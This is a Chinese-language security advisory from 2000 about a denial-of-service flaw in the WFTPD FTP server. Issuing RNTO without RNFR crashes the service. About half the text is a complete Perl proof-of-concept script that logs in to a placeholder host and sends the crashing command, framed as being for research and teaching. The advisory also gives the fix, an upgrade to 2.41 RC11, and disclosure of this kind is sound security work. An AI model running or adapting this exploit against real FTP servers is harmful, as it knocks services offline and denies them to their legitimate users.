WFTPD 拒绝服务攻击漏洞
发布日期:2000-07-12
更新日期:2000-07-12
受影响系统:
WFTPD/WFTPD Pro 2.41 RC10以及更低版本
- Microsoft Windows NT 4.0
- Microsoft Windows NT 2000
不受影响系统:
WFTPD/WFTPD Pro 2.41 RC11
- Microsoft Windows NT 4.0
- Microsoft Windows NT 2000
描述:
用户连接到WFtpd server后,如果不先使用RNFR命令就执行RNTO命令,就将导致WFtpd server
崩溃,服务停止响应,必须重新启动服务。
<* 来源:BluePanda (bluepanda@dwarf.box.sk)
http://bluepanda.box.sk/
*>
测试方法:
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
#!/usr/bin/perl
#
# WFTPD/WFTPD Pro 2.41 RC10 denial-of-service
# Blue Panda - bluepanda@dwarf.box.sk
# http://bluepanda.box.sk/
#
# ----------------------------------------------------------
# Disclaimer: this file is intended as proof of concept, and
# is not intended to be used for illegal purposes. I accept
# no responsibility for damage incurred by the use of it.
# ----------------------------------------------------------
#
# Issues an RNTO command without first using RNFR, causing WFTPD to crash.
#
use IO::Socket;
$host = "ftp.host.com" ;
$port = "21";
$user = "anonymous";
$pass = "p\@nda";
$wait = 10;
# Connect to server.
print "Connecting to $host:$port...";
$socket = IO::Socket::INET->new(Proto=>"tcp", PeerAddr=>$host,
PeerPort=>$port) || die "failed.\n";
print "done.\n";
# Login and issue premature RNTO command.
print $socket "USER $user\nPASS $pass\nRNTO x\n";
# Wait a while, just to make sure the commands have arrived.
print "Waiting...";
$time = 0;
while ($time < $wait) {
sleep(1);
print ".";
$time += 1;
}
# Finished.
close($socket);
print "\nConnection closed. Finished.\n"
建议:
升级到WFTPD/WFTPD Pro 2.41 RC11版本
浏览次数:6169
严重程度:0(网友投票)
